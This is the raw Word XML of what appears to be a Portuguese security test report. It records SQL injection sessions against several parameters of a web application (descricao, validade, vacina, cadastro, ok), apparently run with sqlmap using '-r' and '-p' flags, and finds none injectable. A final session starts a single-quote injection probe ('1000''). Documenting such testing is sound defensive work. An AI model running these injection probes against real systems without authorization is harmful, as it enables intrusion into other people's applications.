    <w:p w14:paraId="66AEC95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A6DF45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4743146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Espera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73739899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descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” e não permita que ele seja vulnerável à injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2213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0B109B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12CF211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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O parâmetro “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descricao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” para teste de injeção SQL não é injetável conforme mostra a Figura 16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F35B7F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ADE55B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E8A498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9680" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A2BAF27" wp14:editId="28EB6AEC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>329565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5209540" cy="3987800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21462"/>
                <wp:lineTo x="21484" y="21462"/>
                <wp:lineTo x="21484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3C54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F239A0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3D977C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8D4063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8FE994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A4A64CC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309CE9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A4625B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022525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FBDEAE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3E8D60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71ADF5" wp14:editId="262B821F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>386715</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>278765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3762375" cy="1809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0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657BA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30.45pt;margin-top:21.95pt;width:296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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4668221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Figura 16 – Resultado aplicação SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Injection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via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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F17C5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023BEC3A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E21FA5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4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30E4EE16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98E971C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Alterar o comando utilizado na Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validade”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47F43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Tentar injeção de SQL no parâmetro “validade”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970190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C7BF1F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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando utilizado: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p validade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF3A5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F6E2E17" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB0651" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo 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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E22B9" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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“-p” indica o parâmetro a ser injetado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pel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, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66F01F" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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validade” é o parâmetro que sofrerá sessão de teste de injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411691B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9E17CD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14:paraId="7A7E152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a aplicação faça o tratamento do parâmetro “validade” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE279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E42F04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0908B4C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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O parâmetro “validade” escolhido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para teste de injeção SQL não é injetável conforme mostra a Figura 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B053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0704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E2BAB3D" wp14:editId="1C55240C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>110490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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C6A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548E98" wp14:editId="0BEF1378">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>177165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1341755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="39052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CA9F4C" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:13.95pt;margin-top:-105.65pt;width:307.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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 17- Resultado exploração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Injection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no campo validade via </w:t>
      </w:r>
      <w:proofErr w:type="spell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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6F30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9362A16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5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DF95FF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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E355A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Alterar o comando utilizado na Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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nomeSistema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6658E59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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema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>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6CC57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6E087D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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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–r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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–p vacina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8886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E254822" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D1817" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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O comando “–r“ indica ao programa que as instruções do ataque devem ser carregadas no arquivo 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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A21F19" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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“-p” indica o parâmetro que deve ser injetado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pel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, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FB568" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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vacina” é o atributo que sofrerá sessão de teste de injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F40E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8D8D95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7217DEFC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a aplicação faça o tratamento do parâmetro “vacina” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D262B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A2188A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538452C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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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Pr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O parâmetro “vacina” escolhido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para teste de injeção SQL não é injetável conforme mostra a Figura 18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668432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1728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6DCAA98C" wp14:editId="12D76097">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>201295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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488" y="21513"/>
                <wp:lineTo x="21488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61FF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A136BA" wp14:editId="22BD6E6A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>72390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1423670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="1422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CCEB0D" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.7pt;margin-top:-112.1pt;width:308.25pt;height:1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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 18 – Resultado exploração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Injection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no campo vacina via </w:t>
      </w:r>
      <w:proofErr w:type="spell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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6521E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5D3106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D285B8A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lastRenderedPageBreak/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6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="704C921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Alterar o comando utilizado na Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DC88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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E530890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27C392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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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-p cadastro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A979E4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AB5E8D0" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB123E3" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAC1BC" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA73652" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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cadastro” é o atributo que sofrerá sessão de teste de injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DBA64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686DE5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5F0D773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a aplicação faça o tratamento do parâmetro “cadastro” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A271B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CF2187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7EA10E3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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O parâmetro “cadastro” escolhido para teste de injeção SQL não é injetável conforme mostra a Figura 19.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AAC898" w14:textId="3D0BC275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2752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38C5FAAF" wp14:editId="072FCA97">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="4126865"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21537"/>
                <wp:lineTo x="21488" y="21537"/>
                <wp:lineTo x="21488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E31A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18E83B" wp14:editId="2791D6BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>339090</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1369060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="28575" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="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847D40" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:26.7pt;margin-top:-107.8pt;width:308.25pt;height:1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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 19 – Resultado exploração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Injection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no campo cadastro via </w:t>
      </w:r>
      <w:proofErr w:type="spell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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24BE78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lastRenderedPageBreak/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7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58ABEEC3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6F3A1B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Alterar o comando utilizado na Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F61B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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A37AF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8B17AB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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181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4D4181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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDE3F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EE090D8" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482174D4" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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-p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468BB1FF" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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ok” é o atributo que sofrerá sessão de teste de injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78385A5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4EE286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5F91A44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a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71573677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 “ok” e não permita que o campo seja injetável à SQL.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D15FC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0551CF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4C44A28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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181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D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O parâmetro “ok” escolhido para teste de injeção SQL não é injetável conforme mostra a Figura 20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C898A" w14:textId="4F7BAC4A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4800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="730B5C7D" wp14:editId="568D7DE1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>186690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400040" cy="4058285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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51AD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FF86E4" wp14:editId="36E682A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>234315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1446530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3609975" cy="1524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3A87C9" id="Retângulo 12" o:spid="_x0000_s1026" style="position:absolute;margin-left:18.45pt;margin-top:-113.9pt;width:284.2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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 20 – Resultado exploração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Injection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no parâmetro ok via </w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:p>
    <w:p w14:paraId="4773B4A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CE626E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46F93FB" w14:textId="24185AE9" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00225158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4.3.4</w:t>
      </w:r>
      <w:r w:rsidR="00A16205"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.4 Tela Consulta Servidor – Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A16205" w:rsidRPr="004D4181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</w:p>
    <w:p w14:paraId="278CEE2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Tarefa realizada dia 18/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498620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Duração total das sessões executadas: 1 hora e 40 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F63C1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56B9D5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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7EDBE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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Consulta Servidor </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para forçar ações não autorizadas no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8197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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84F81D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1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="142F583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758DE9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Verificar se o campo “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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL utilizando a técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2761580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C7AA52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Entrada: 1000’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E0A1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3757D5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D56C89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55A8CC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2DD8213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o sistema realize o tratamento do caractere aspa simples como um parâmetro regular da consulta.</w:t>
      </w:r>
    </w:p>
